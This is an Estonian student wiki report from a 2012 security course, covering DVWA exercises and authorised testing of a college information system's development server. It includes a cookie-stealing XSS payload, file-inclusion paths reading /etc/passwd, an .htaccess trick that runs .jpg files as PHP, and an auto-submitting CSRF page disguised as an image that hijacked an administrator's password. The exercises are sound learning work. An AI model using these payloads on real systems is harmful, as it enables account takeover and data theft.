<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.

Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T20:48:50Z

Ulihten: /* Burp suite */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] <br>
Taavi esitlus [[Media:A9.pdf]] <br>
Taavi esitlus [[Media:A5.pdf]] <br>
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] <br>
Matise esitlus [[Media:Security Misconfiguration.pdf]] <br>
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] <br>

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.<br>
Faile saab alla laadida enda profiili all õppesooritustes.<br>
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.<br>
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.<br>
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.<br>
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.<br>
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.<br>

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
====Burp suite====

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===
==Väike upload tegevus, mis võiks olla teisiti==
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.
Proovisime üles laadida:
<li>filmi
<li>exe
<li>jpm faile
<br>kõik läks läbi ja sai uploadida.
<br>Sellises kohas võiks olla süsteem tehtud <b>whitelisti</b> põhimõttel,
<br>et lubatud oleks ainult:
<li>.doc
<li>.docx
<li>.pdf

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
